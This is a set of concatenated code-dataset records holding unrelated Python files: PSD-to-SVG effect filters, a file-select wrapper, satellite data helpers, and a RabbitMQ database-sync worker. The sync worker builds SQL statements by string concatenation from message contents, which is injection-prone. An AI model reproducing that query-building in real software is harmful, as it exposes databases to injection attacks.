l[1:-1].strip()\n yield (l, comment, self.section, f.name, i, line)\n else:\n if (l or self).handleempty:\n pass\n else:\n yield (\n l, comment, self.section, f.name, i, line)\n except (ValueError, IndexError):\n raise ParseError(f\"Error in file {filename} on line #{i}: {line}\")\n\n def defined(self, macro: str) -> bool:\n \"\"\"Check if a preprocessor macro is #defined or not\"\"\"\n return macro in self.defines\n\n def ifdefs_allow_reading(self) -> bool:\n \"\"\"Check if the current state of 
#ifdef and #ifndef clauses allow reading/interpreting or not.\"\"\"\n return all([self.defined(macro) and state or not self.defined(macro) and not state for macro, state in self.ifdefs])","sub_path":"pycfiles/gmxbatch-0.0.2.dev0.linux-x86_64.tar/topologyfilter.cpython-37.py","file_name":"topologyfilter.cpython-37.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"47326124","text":"import imp\r\n_pyfileselect = imp.load_dynamic('_pyfileselect', '\\\\sys\\\\bin\\\\kf__pyfileselect.pyd')\r\ndel imp\r\n\r\nfrom _pyfileselect import videos_path, others_path, sounds_path, simple_sounds_path, rom_root_path, presence_logos_path, phone_memory_root_path\r\nfrom _pyfileselect import mms_background_images_path, memory_card_root_path, memory_card_contacts_path, installs_path\r\nfrom _pyfileselect import images_path, gms_pictures_path, games_path, digital_sounds_path, images_thumbnail_path\r\n\r\nDialogTypeSave = 0\r\nDialogTypeMove = 1\r\nDialogTypeCopy = 2\r\ndef select_file(path=u\"C:\\\\\", title=None):\r\n useDefaultTitle = 0\r\n if title is None:\r\n useDefaultTitle = 1\r\n title = u\"\"\r\n filename = _pyfileselect.select_file(path, title, useDefaultTitle)\r\n if (filename == \"\"):\r\n return None\r\n else:\r\n return unicode(filename)\r\n\r\ndef select_memory(title=None):\r\n useDefaultTitle = 0\r\n if title is None:\r\n useDefaultTitle = 1\r\n title = u\"\"\r\n filename = _pyfileselect.select_memory(title, useDefaultTitle)\r\n if (filename == \"\"):\r\n return None\r\n else:\r\n return unicode(filename)\r\n \r\ndef select_folder(path = u\"C:\\\\\", type=DialogTypeCopy, title=None, rightRoot = None, leftSelect = None):\r\n useDefaultTitle = 0\r\n if title is None:\r\n useDefaultTitle = 1\r\n title = u\"\"\r\n useDefaultRight = 0\r\n if rightRoot is None:\r\n useDefaultRight = 1\r\n rightRoot = u\"\"\r\n useDefaultLeft = 0\r\n if leftSelect is None:\r\n useDefaultLeft = 1\r\n leftSelect = u\"\"\r\n folder = _pyfileselect.select_folder(type, path, title, useDefaultTitle, rightRoot, useDefaultRight, leftSelect, useDefaultLeft)\r\n if (folder == \"\"):\r\n return None\r\n else:\r\n return unicode(folder)","sub_path":"pyfileselect2/python/pyfileselect.py","file_name":"pyfileselect.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"176954176","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\nfrom logging import getLogger\nimport numpy as np\nimport svgwrite\nfrom psd_tools.constants import TaggedBlock\nfrom psd_tools.decoder.actions import List, Descriptor\nfrom psd2svg.converter.constants import BLEND_MODE2\nfrom psd2svg.utils.color import cmyk2rgb\n\n\nlogger = getLogger(__name__)\n\n\nclass EffectsConverter(object):\n\n def _get_effects(self, layer):\n blocks = layer._tagged_blocks\n effects = blocks.get(\n b'lfx2', blocks.get(b'lfxs', blocks.get(b'lmfx', None)))\n enabled_effects = {}\n if effects:\n for key, info in effects.descriptor.items:\n if key == b'masterFXSwitch' and not info.value:\n return None\n if isinstance(info, List):\n info = info.items[0]\n if not isinstance(info, Descriptor):\n continue\n items = dict(info.items)\n if not items[b'enab'].value:\n continue\n enabled_effects[key] = items\n return None if len(enabled_effects) == 0 else enabled_effects\n else:\n return None\n\n def _add_effects(self, effects, layer, target, fill_opacity, 
blend_mode):\n effects_group = self._dwg.g()\n for index in reversed(range(len(target.elements))):\n if isinstance(target.elements[index], svgwrite.base.Title):\n effects_group.elements.append(target.elements.pop(index))\n effects_group['class'] = 'layer-effects'\n effects_group.get_iri()\n\n # TODO: b'ebbl' and multiple effects.\n\n # Outer effects.\n if b'DrSh' in effects:\n effects_group.add(self._add_drsh(\n effects[b'DrSh'], target.get_iri()))\n if b'OrGl' in effects:\n effects_group.add(self._add_orgl(\n effects[b'OrGl'], target.get_iri()))\n\n # TODO: clipped blending option clbl.\n self._add_interior_effects(effects, layer, effects_group, target,\n fill_opacity, blend_mode)\n\n # Stroke effect.\n if b'FrFX' in effects:\n effects_group.add(self._add_frfx(\n effects[b'FrFX'], target.get_iri()))\n\n return effects_group\n\n def _add_interior_effects(self, effects, layer, effects_group, target,\n fill_opacity, blend_mode):\n # Fill effects turns source into mask. Otherwise render.\n mask_iri = None\n if (b'GrFl' in effects or b'SoFi' in effects or\n b'patternFill' in effects):\n self._dwg.defs.add(target)\n use = self._dwg.use(target.get_iri(), opacity=fill_opacity)\n if 'style' in target.attribs:\n use['style'] = target.attribs.pop('style')\n effects_group.add(use)\n mask_iri = self._make_fill_mask(layer, target.get_iri())\n elif fill_opacity < 1.0:\n self._dwg.defs.add(target)\n effects_group.add(self._dwg.use(\n target.get_iri(), opacity=fill_opacity))\n else:\n effects_group.add(target)\n\n if mask_iri:\n if b'patternFill' in effects:\n effects_group.add(self._add_patternfill(\n effects[b'patternFill'], layer, mask_iri, blend_mode))\n if b'GrFl' in effects:\n effects_group.add(self._add_grfl(\n effects[b'GrFl'], layer, mask_iri, blend_mode))\n if b'SoFi' in effects:\n effects_group.add(self._add_sofi(\n effects[b'SoFi'], layer, mask_iri, blend_mode))\n\n # Inner effects.\n if b'IrSh' in effects:\n effects_group.add(self._add_irsh(\n effects[b'IrSh'], target.get_iri(), blend_mode))\n if b'IrGl' in effects:\n effects_group.add(self._add_irgl(\n effects[b'IrGl'], target.get_iri(), blend_mode))\n\n def _make_fill_mask(self, layer, target_iri):\n if not layer.bbox:\n logger.warning('Fill effect to empty layer.')\n return None\n\n mask = self._dwg.defs.add(self._dwg.mask(\n size=(layer.bbox.width, layer.bbox.height)\n ))\n mask['color-interpolation'] = 'sRGB'\n use = mask.add(self._dwg.use(target_iri))\n use['filter'] = self._get_white_filter().get_funciri()\n return mask.get_funciri()\n\n def _add_patternfill(self, items, layer, mask_iri, blend_mode):\n size = (layer.bbox.width, layer.bbox.height)\n pattern = self._make_pattern(items, (layer.bbox.x1, layer.bbox.y1))\n rect = self._dwg.rect(\n size=size,\n insert=(layer.bbox.x1, layer.bbox.y1),\n fill=pattern.get_funciri(), mask=mask_iri)\n rect['class'] = 'layer-effect pattern-fill'\n rect['fill-opacity'] = items[b'Opct'].value / 100.0\n\n if not blend_mode:\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n rect['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return rect\n\n def _add_grfl(self, items, layer, mask_iri, blend_mode):\n size = (layer.bbox.width, layer.bbox.height)\n grad = self._make_gradient(items, size)\n rect = self._dwg.rect(\n size=size,\n insert=(layer.bbox.x1, layer.bbox.y1),\n fill=grad.get_funciri(), mask=mask_iri)\n rect['class'] = 'layer-effect gradient-fill'\n opacity = items[b'Opct'].value / 100.0\n if opacity != 1.0:\n rect['fill-opacity'] = opacity\n\n if not 
blend_mode:\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n rect['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return rect\n\n def _add_sofi(self, items, layer, mask_iri, blend_mode):\n rect = self._dwg.rect(\n size=(layer.bbox.width, layer.bbox.height),\n insert=(layer.bbox.x1, layer.bbox.y1),\n fill=self._get_color_in_item(items), mask=mask_iri)\n rect['class'] = 'layer-effect solid-fill'\n rect['fill-opacity'] = items[b'Opct'].value / 100.0\n\n if not blend_mode:\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n rect['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return rect\n\n def _add_drsh(self, items, target_iri):\n blur = items[b'blur'].value\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n\n spread = items[b'Ckmt'].value / 100\n angle = items[b'lagl'].value\n radius = items[b'Dstn'].value\n dx = radius * np.cos(np.radians(angle))\n dy = radius * np.sin(np.radians(angle))\n\n filt = self._dwg.defs.add(self._dwg.filter(\n x='-50%', y='-50%', size=('200%', '200%')))\n filt['class'] = 'drop-shadow'\n filt.feOffset('SourceAlpha', dx=dx, dy=dy, result='drshOffset')\n filt.feGaussianBlur('drshOffset', stdDeviation=blur / 2,\n result='drshBlur')\n transfer = filt.feComponentTransfer('drshBlur', result='drshBlurA')\n transfer.feFuncA('linear', slope=1.0 + 4 * spread, intercept=0.0)\n flood = filt.feFlood(result='drshFlood')\n flood['flood-color'] = self._get_color_in_item(items)\n flood['flood-opacity'] = items[b'Opct'].value / 100.0\n filt.feComposite('drshFlood', in2='drshBlurA', operator='in',\n result='drshShadow')\n\n target = self._dwg.use(target_iri, filter=filt.get_funciri())\n target['class'] = 'layer-effect drop-shadow'\n if blend_mode != 'normal':\n target['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return target\n\n def _add_orgl(self, items, target_iri):\n blur = items[b'blur'].value\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n spread = items[b'Ckmt'].value / 100\n\n # Real outer glow needs distance transform.\n filt = self._dwg.defs.add(self._dwg.filter(\n x='-50%', y='-50%', size=('200%', '200%')))\n filt['class'] = 'outer-glow'\n # Saturate alpha mask before glow if non-zero spread.\n if spread > 0:\n transfer = filt.feComponentTransfer('SourceAlpha',\n result='orglAlpha')\n transfer.feFuncA('linear', slope=255, intercept=0.0)\n result = 'orglDilate'\n filt.feMorphology('orglAlpha', radius=blur * spread,\n operator='dilate', result=result)\n else:\n result = 'SourceAlpha'\n filt.feGaussianBlur(\n result, stdDeviation=blur * (1 - spread), result='orglBlur')\n transfer = filt.feComponentTransfer('orglBlur', result='orglBlurA')\n transfer.feFuncA('linear', slope=1 + 4 * spread, intercept=0.0)\n flood = filt.feFlood(result='orglFlood')\n # TODO: Gradient fill\n flood['flood-color'] = color = self._get_color_in_item(items)\n flood['flood-opacity'] = items[b'Opct'].value / 100.0\n filt.feComposite('orglFlood', in2='orglBlurA', operator='in',\n result='orglShadow')\n filt.feComposite('orglShadow', in2='SourceAlpha', operator='out',\n result='orglShadowA')\n\n target = self._dwg.use(target_iri, filter=filt.get_funciri())\n target['class'] = 'layer-effect outer-glow'\n if blend_mode != 'normal':\n target['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return target\n\n def _add_irsh(self, items, target_iri, blend_mode):\n blur = items[b'blur'].value\n angle = items[b'lagl'].value\n radius = items[b'Dstn'].value\n dx = radius * 
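`_add_drsh` builds the standard SVG drop-shadow primitive chain: offset the source alpha, blur it, recolor it with a flood, then composite the flood into the blurred silhouette. A minimal self-contained version with svgwrite, using the same filter primitives as above but hard-coded offset/blur/color values (so it only illustrates the chain, not the PSD-driven parameters):

import svgwrite

dwg = svgwrite.Drawing('shadow.svg', size=(100, 100))
filt = dwg.defs.add(dwg.filter(x='-50%', y='-50%', size=('200%', '200%')))
filt.feOffset('SourceAlpha', dx=4, dy=4, result='off')     # shift the silhouette
filt.feGaussianBlur('off', stdDeviation=2, result='blur')  # soften it
flood = filt.feFlood(result='flood')                       # shadow colour
flood['flood-color'] = 'black'
flood['flood-opacity'] = 0.6
filt.feComposite('flood', in2='blur', operator='in')       # keep flood where blur is
rect = dwg.add(dwg.rect(insert=(20, 20), size=(40, 40), fill='red'))
rect['filter'] = filt.get_funciri()
dwg.save()

Note that an element drawn with this filter shows only the shadow; the converter above therefore applies the filter to a <use> copy of the layer and stacks the real artwork on top of it.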
np.cos(np.radians(angle))\n dy = radius * np.sin(np.radians(angle))\n\n filt = self._dwg.defs.add(self._dwg.filter())\n filt['class'] = 'inner-shadow'\n flood = filt.feFlood(result='irshFlood')\n flood['flood-color'] = color = self._get_color_in_item(items)\n flood['flood-opacity'] = items[b'Opct'].value / 100.0\n filt.feComposite('irshFlood', in2='SourceAlpha', operator='out',\n result='irshShadow')\n filt.feOffset('irshShadow', dx=dx, dy=dy, result='irshOffset')\n filt.feGaussianBlur('irshOffset', stdDeviation=blur / 2,\n result='irshBlur')\n filt.feComposite('irshBlur', in2='SourceAlpha', operator='in',\n result='irshShadow')\n\n target = self._dwg.use(target_iri, filter=filt.get_funciri())\n target['class'] = 'layer-effect inner-shadow'\n if not blend_mode:\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n target['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return target\n\n def _add_irgl(self, items, target_iri, blend_mode):\n blur = items[b'blur'].value\n spread = items[b'Ckmt'].value / 100\n\n # Real inner glow needs distance transform.\n filt = self._dwg.defs.add(self._dwg.filter())\n filt['class'] = 'inner-glow'\n flood = filt.feFlood(result='irglFlood')\n # TODO: Gradient fill\n flood['flood-color'] = color = self._get_color_in_item(items)\n flood['flood-opacity'] = items[b'Opct'].value / 100.0\n # Saturate alpha mask before glow.\n transfer = filt.feComponentTransfer('SourceAlpha', result='irglAlpha')\n transfer.feFuncA('linear', slope=255, intercept=0)\n filt.feComposite('irglFlood', in2='irglAlpha', operator='out',\n result='irglShadow')\n filt.feMorphology('irglShadow', radius=blur * spread,\n operator='dilate', result='irglDilate')\n filt.feGaussianBlur('irglDilate', stdDeviation=blur * (1 - spread),\n result='irglBlur')\n filt.feComposite('irglBlur', in2='irglAlpha', operator='in',\n result='irglShadow')\n\n target = self._dwg.use(target_iri, filter=filt.get_funciri())\n target['class'] = 'layer-effect inner-glow'\n if not blend_mode:\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n target['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return target\n\n def _add_frfx(self, items, target_iri):\n radius = int(items[b'Sz '].value)\n style = items[b'Styl'].value\n\n filt = self._dwg.defs.add(self._dwg.filter())\n filt['class'] = 'stroke'\n\n flood = filt.feFlood(result='frfxFlood')\n # TODO: Gradient or pattern fill\n flood['flood-color'] = self._get_color_in_item(items)\n flood['flood-opacity'] = items[b'Opct'].value / 100.0\n if style == b'OutF':\n filt.feMorphology('SourceAlpha', result='frfxMorph',\n operator='dilate', radius=radius)\n filt.feComposite('frfxFlood', in2='frfxMorph', operator='in',\n result='frfxBoundary')\n filt.feComposite('frfxBoundary', in2='SourceAlpha',\n operator='out')\n elif style == b'InsF':\n filt.feMorphology('SourceAlpha', result='frfxMorph',\n operator='erode', radius=radius)\n filt.feComposite('frfxFlood', in2='frfxMorph', operator='out',\n result='frfxBoundary')\n filt.feComposite('frfxBoundary', in2='SourceAlpha',\n operator='in')\n else:\n filt.feMorphology('SourceAlpha', result='frfxDilate',\n operator='dilate', radius=radius / 2.0)\n filt.feMorphology('SourceAlpha', result='frfxErode',\n operator='erode', radius=radius / 2.0)\n filt.feComposite('frfxDilate', in2='frfxErode', operator='out',\n result='frfxMorph')\n filt.feComposite('frfxFlood', in2='frfxMorph', operator='in')\n\n target = self._dwg.use(target_iri, 
filter=filt.get_funciri())\n target['class'] = 'layer-effect stroke'\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n target['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return target\n\n def _get_color_in_item(self, items, scale=1):\n # TODO: Color space support other than RGB.\n if b'Clr ' in items:\n color = items[b'Clr ']\n if color.classID == b'Grsc':\n luminosity = (100.0 - color.items[0][1].value) / 100.0\n return 'rgb({0},{0},{0})'.format(int(255 * luminosity))\n elif color.classID == b'RGBC':\n color_items = dict(color.items)\n # b'Nm ', b'bookID', b'bookKey' fields can exist.\n return 'rgb({},{},{})'.format(\n int(color_items[b'Rd '].value),\n int(color_items[b'Grn '].value),\n int(color_items[b'Bl '].value))\n elif color.classID == b'CMYC':\n color_items = dict(color.items)\n cmyk = (color_items[b'Cyn '].value,\n color_items[b'Mgnt'].value,\n color_items[b'Ylw '].value,\n color_items[b'Blck'].value)\n rgb = cmyk2rgb(cmyk)\n return 'rgb({},{},{})'.format(*map(int, rgb))\n else:\n logger.error('Unsupported color: {}'.format(color.classID))\n raise NotImplementedError\n elif b'Grad' in items:\n logger.warning('Unsupported gradient fill')\n grad = dict(items[b'Grad'].items)\n if b'Clrs' in grad:\n colors = grad[b'Clrs'].items\n colors = [tuple(int(c[1].value / scale)\n for c in dict(clr.items)[b'Clr '].items)\n for clr in colors]\n return 'rgb({},{},{})'.format(*colors[0])\n else:\n return 'rgb(255,255,255)' # TODO: Get grad reference.\n else:\n logger.error('Unknown color in items: {}'.format(items.keys()))\n raise NotImplementedError\n\n def _get_fill(self, layer):\n blocks = layer._tagged_blocks\n if b'PtFl' in blocks: # TODO implement\n logger.warning('Unsupported pattern fill')\n return 'none'\n for key in TaggedBlock._FILL_KEYS:\n if key in blocks:\n items = dict(blocks[key].data.items)\n return self._get_color_in_item(items)\n return 'none'\n\n def _make_pattern(self, items, insert=(0, 0)):\n pattern_id = dict(items[b'Ptrn'].items)[b'Idnt'].value\n patt = self._psd.patterns.get(pattern_id, None)\n if not patt:\n logger.warning('Pattern data not found')\n return patt\n\n pattern = self._dwg.defs.add(svgwrite.pattern.Pattern())\n pattern['width'] = patt.width\n pattern['height'] = patt.height\n pattern['patternUnits'] = 'userSpaceOnUse'\n pattern['patternContentUnits'] = 'userSpaceOnUse'\n\n align = items[b'Algn'].value\n phase = dict(items[b'phase'].items)\n phase = (phase[b'Hrzn'].value, phase[b'Vrtc'].value)\n scale = items[b'Scl '].value\n pattern['patternTransform'] = 'translate({},{}) scale({})'.format(\n insert[0] + phase[0], insert[1] + phase[1], scale / 100.0)\n pattern.add(self._dwg.image(\n self._get_image_href(patt.as_PIL()), insert=(0, 0),\n size=(patt.width, patt.height)))\n return pattern\n\n def _make_gradient(self, items, size):\n if items[b'Type'].value == b'Rdl ':\n grad = self._dwg.defs.add(svgwrite.gradients.RadialGradient(\n center=None, r=.5))\n else:\n theta = np.radians(-items[b'Angl'].value)\n start = np.array([size[0] * np.cos(theta - np.pi),\n size[1] * np.sin(theta - np.pi)])\n end = np.array([size[0] * np.cos(theta), size[1] * np.sin(theta)])\n r = 1.0 * np.max(np.abs(start))\n start = start / (2 * r) + 0.5\n end = end / (2 * r) + 0.5\n\n start = [np.around(x, decimals=6) for x in start]\n end = [np.around(x, decimals=6) for x in end]\n\n grad = self._dwg.defs.add(svgwrite.gradients.LinearGradient(\n start=start, end=end))\n\n grad_items = dict(items[b'Grad'].items)\n if b'Clrs' not in 
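`cmyk2rgb` (imported from psd2svg.utils.color) does the usual naive conversion. Assuming PSD stores CMYK components on a 0-100 scale, the formula is roughly the following sketch, not the library's exact code and with no ICC-profile handling:

def cmyk_to_rgb(c, m, y, k):
    """Naive CMYK (0-100 each) -> RGB (0-255 each)."""
    c, m, y, k = (v / 100.0 for v in (c, m, y, k))
    r = 255 * (1 - c) * (1 - k)
    g = 255 * (1 - m) * (1 - k)
    b = 255 * (1 - y) * (1 - k)
    return r, g, b

# e.g. pure cyan: cmyk_to_rgb(100, 0, 0, 0) -> (0.0, 255.0, 255.0)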
grad_items:\n logger.warning('Unsupported gradient type')\n return grad\n color_list = [dict(v.items) for v in grad_items[b'Clrs'].items]\n opacity_list = [dict(v.items) for v in grad_items[b'Trns'].items]\n\n # Interpolate color and opacity for both points.\n cp = np.array([x[b'Lctn'].value / 4096 for x in color_list])\n op = np.array([x[b'Lctn'].value / 4096 for x in opacity_list])\n c_items = np.array([[y[1].value for y in x[b'Clr '].items] for x\n in color_list]).transpose()\n o_items = np.array([x[b'Opct'].value / 100.0 for x in opacity_list])\n\n # Remove duplicate points.\n index = np.concatenate((np.diff(cp) > 0, [True]))\n if np.any(np.logical_not(index)):\n logger.warning('Duplicate gradient color stop: {}'.format(cp))\n cp = cp[index]\n c_items = c_items[:, index]\n index = np.concatenate((np.diff(op) > 0, [True]))\n if np.any(np.logical_not(index)):\n logger.warning('Duplicate gradient opacity stop: {}'.format(op))\n op = op[index]\n o_items = o_items[index]\n\n # Single point handling.\n if len(cp) < 2:\n cp = np.array([0.0, 1.0])\n c_items = np.concatenate((c_items, c_items), axis=1)\n if len(op) < 2:\n op = np.array([0.0, 1.0])\n o_items = np.array(list(o_items) + list(o_items))\n\n # Reverse if specified.\n if items[b'Rvrs'].value:\n cp = 1.0 - cp[::-1]\n op = 1.0 - op[::-1]\n c_items = c_items[:, ::-1]\n o_items = o_items[::-1]\n\n mp = np.unique(np.concatenate((cp, op)))\n fc = np.stack(\n [np.interp(mp, cp, c_items[index, :]) for index in range(3)])\n fo = np.interp(mp, op, o_items)\n\n for index in range(len(mp)):\n color = tuple(fc[:, index].astype(np.uint8).tolist())\n grad.add_stop_color(\n offset=mp[index], opacity=fo[index],\n color='rgb{}'.format(color))\n return grad\n\n def _get_white_filter(self, color='white'):\n if not self._white_filter:\n self._white_filter = self._dwg.defs.add(self._dwg.filter())\n self._white_filter['class'] = 'white-filter'\n if color == 'white':\n self._white_filter.feColorMatrix(\n 'SourceAlpha', type='matrix',\n values=\"0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 1 0\")\n else:\n self._white_filter.feColorMatrix(\n 'SourceAlpha', type='matrix',\n values=\"0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0\")\n return self._white_filter\n\n def _get_identity_filter(self):\n if not self._identity_filter:\n self._identity_filter = self._dwg.defs.add(self._dwg.filter())\n self._identity_filter['class'] = 'identify-filter'\n transfer = self._identity_filter.feComponentTransfer(\n 'SourceGraphic')\n transfer['color-interpolation'] = 'sRGB'\n transfer.feFuncR('identity')\n transfer.feFuncG('identity')\n transfer.feFuncB('identity')\n transfer.feFuncA('identity')\n return self._identity_filter\n","sub_path":"src/psd2svg/converter/effects.py","file_name":"effects.py","file_ext":"py","file_size_in_byte":22034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"188500063","text":"import tempfile\nimport os\nimport uuid\n\n\nclass File:\n def __init__(self, file_adress):\n self.file_adress = file_adress\n\n def write(self, line):\n with open(self.file_adress, \"w\") as f:\n f.write(line)\n\n def read(self):\n with open(self.file_adress, \"r\") as f:\n return f.read()\n\n def __add__(self, obj): # DODELAT\n newfile = os.path.join(tempfile.gettempdir(), \"file_\" + str(uuid.uuid1()) + \".txt\")\n with open(self.file_adress, \"r\") as x:\n with open(obj.file_adress, \"r\") as y:\n with open(newfile, \"a\") as f:\n f.write(x.read())\n f.write(y.read())\n return File(newfile)\n\n def __iter__(self):\n with 
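The gradient builder above merges the separate colour-stop and opacity-stop tracks by interpolating both onto the union of their positions with `np.interp`. In isolation the trick looks like this:

import numpy as np

# colour stops: positions in [0, 1] and one row per RGB channel
cp = np.array([0.0, 1.0])
c_items = np.array([[255, 0], [0, 0], [0, 255]])   # red -> blue
# opacity stops on their own, independent positions
op = np.array([0.0, 0.5, 1.0])
o_items = np.array([1.0, 0.25, 1.0])

mp = np.unique(np.concatenate((cp, op)))           # merged stop positions
fc = np.stack([np.interp(mp, cp, c_items[i]) for i in range(3)])
fo = np.interp(mp, op, o_items)
for i, pos in enumerate(mp):
    print(pos, fc[:, i].astype(int), fo[i])        # one SVG stop per row
# 0.0 [255 0 0] 1.0 / 0.5 [127 0 127] 0.25 / 1.0 [0 0 255] 1.0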
open(self.file_adress, \"r\") as f:\n lines = f.readlines()\n return iter(lines)\n\n def __str__(self):\n return self.file_adress\n\n\ndef _test():\n a = File(\"1.txt\")\n b = File(\"2.txt\")\n d = File(\"3.txt\")\n c = a + b\n print(c)\n x = c + d\n print(x)\n for line in x:\n print(line)\n\n a.write(\"azaza\")\n print(a.read())\n\n\nif __name__ == \"__main__\":\n _test()\n","sub_path":"dive-in-python/4.fail-s-magicheskimi-metodami.py","file_name":"4.fail-s-magicheskimi-metodami.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"589120694","text":"import abc\nimport datetime\nimport itertools\nimport os\nimport time\n\nimport numpy as np\nfrom spacepy import datamodel as dm\n\nimport packet\nimport page\n\ndef hex2int(inpage):\n \"\"\"\n convert a page of ascii hex data to integrers and None as needed\n \"\"\"\n dat = []\n for v in inpage:\n try:\n dat.append(int(v, 16))\n except TypeError:\n dat.append(None)\n return dat\n\ndef dat2time(inval):\n \"\"\"\n take 8 bytes and change them to a datetime\n \"\"\"\n t0 = datetime.datetime(2000 + inval[0], inval[1], inval[2],\n inval[3], inval[4], inval[5],\n 1000*(inval[6]*(2**8) + inval[7]))\n return t0\n\ndef validDate(inval, mindate=datetime.datetime(2013, 12, 1), maxdate=datetime.datetime(2015, 12, 31)):\n \"\"\"\n go through input data and if it makes a date in the given rage it is valid, otherwise it is not\n \"\"\"\n try:\n inval = [int(v, 16) for v in inval]\n except TypeError:\n return False\n try:\n date = dat2time(inval)\n if date >= mindate and date <= maxdate:\n return True\n else:\n return False\n except (ValueError, TypeError):\n return False\n\n ## if isinstance(inval, str) and len(inval) > 2:\n ## t0tmp = inval.split()\n ## t1tmp = [int(v, 16) for v in t0tmp[0:6]]\n ## t1tmp.append(int(t0tmp[6]+t0tmp[7], 16))\n ## t0 = datetime.datetime(2000 + t1tmp[0], t1tmp[1], t1tmp[2],\n ## t1tmp[3], t1tmp[4], t1tmp[5], 1000*t1tmp[6])\n ## else:\n ## try:\n ## t1tmp = [int(v, 16) for v in inval[0:6]]\n ## except TypeError:\n ## t1tmp = inval[0:6]\n ## try:\n ## t1tmp.append(int(inval[6]+inval[7], 16))\n ## except TypeError:\n ## t1tmp.append(2**8*inval[6] + inval[7])\n ## try:\n ## t0 = datetime.datetime(2000 + t1tmp[0], t1tmp[1], t1tmp[2],\n ## t1tmp[3], t1tmp[4], t1tmp[5], 1000*t1tmp[6])\n ## except ValueError:\n ## return None\n ## return t0\n\nclass data(object):\n __metaclass__ = abc.ABCMeta\n \"\"\"\n just a few methods common to all the data type classes below\n \"\"\"\n def write(self, filename, hdf5=False):\n if hdf5:\n dm.toHDF5(filename, self.data)\n else:\n dm.toJSONheadedASCII(filename, self.data, order=['Epoch'] )\n print(' Wrote {0}'.format(os.path.abspath(filename)))\n\n @classmethod\n @abc.abstractmethod\n def read(self, filename):\n \"\"\"read in the data from the file\"\"\"\n b = packet.BIRDpackets(filename)\n print(' Read {0} packets'.format(len(b)))\n pages = page.page.fromPackets(b)\n print(' Read {0} pages'.format(len(pages)))\n return pages\n \nclass dataPage(list):\n __metaclass__ = abc.ABCMeta\n\n @abc.abstractmethod\n def major_data(self, inval):\n \"\"\"Method the decodes data with a major time stamp\"\"\"\n return\n\n @abc.abstractmethod\n def minor_data(self, inval):\n \"\"\"Method the decodes data with a minor time stamp\"\"\"\n 
return\n\n\n","sub_path":"L0toL1/FIREdata.py","file_name":"FIREdata.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"397104565","text":"import pika\nfrom database import execute, fetchone, fetchall\nimport json\n\ndef do_synchronize(ch,method,properties,body):\n #sync local dbase for eventual consistency\n action = json.loads(body)['request'] #deserialize the body\n print(\"SYNCHRO RECEIVED\")\n print(action)\n if (action['query'] == \"clear\"):\n db_clear()\n else:\n CONDITION = None\n VALUES = None\n QUERY = action[\"query\"]\n TABLE = action[\"table\"]\n if (\"condition\" in action):\n CONDITION = action[\"condition\"]\n if (\"values\" in action):\n VALUES = action[\"values\"]\n db_write(QUERY,TABLE,VALUES,CONDITION)\n\n ch.basic_ack(delivery_tag=method.delivery_tag) #Acknowledge the message\n\ndef db_clear():\n tables = [\"rides\", \"riders\", \"users\"]\n for table in tables:\n delete_query = '''\n DELETE FROM ''' + table\n execute(delete_query)\n query = '''UPDATE APICOUNT SET COUNT=0'''\n execute(query)\n return {}, 200\n\ndef db_write(query,table,values=None,condition=None):\n query = query\n table = table\n if query == 'insert':\n if values:\n #values = values\n insert_query = '''\n INSERT INTO ''' + table + '(' + ','.join(values.keys()) + ') ' + '''\n VALUES ''' + '(' + ','.join(map(repr, values.values())) + ')'\n if execute(insert_query):\n return 200\n return 400\n elif query == 'delete':\n if condition:\n delete_query = '''\n DELETE FROM ''' + table + '''\n WHERE ''' + ' AND '.join(map(lambda x, y: x + '=' + repr(y), condition.keys(), condition.values()))\n execute(delete_query)\n return 200\n return 400\n elif query == 'update':\n if condition:\n update_query = '''\n UPDATE ''' + table + ''' \n SET ''' + ','.join(map(lambda x, y: x + ' = ' + y, values.keys(), values.values())) + ''' \n WHERE ''' + ' AND '.join(map(lambda x, y: x + '=' + repr(y), condition.keys(), condition.values()))\n execute(update_query)\n return 200\n return 400\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='bunny'))\nsync_channel = connection.channel()\nr = sync_channel.queue_declare(\"\",exclusive=True)\nsync_channel.exchange_declare(exchange = \"syncQ\",exchange_type='fanout') #fanout exchange to allow multiple consumers to receive the message simultaneously\nsync_channel.queue_bind(exchange='syncQ',queue=r.method.queue,routing_key='')\nsync_channel.basic_consume(queue = r.method.queue, on_message_callback = do_synchronize)\nprint(\"SYNCHRO\")\nsync_channel.start_consuming()\n","sub_path":"Project-DBaaS/dbaas/worker/synchro.py","file_name":"synchro.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"464982533","text":"# -*- coding: utf-8 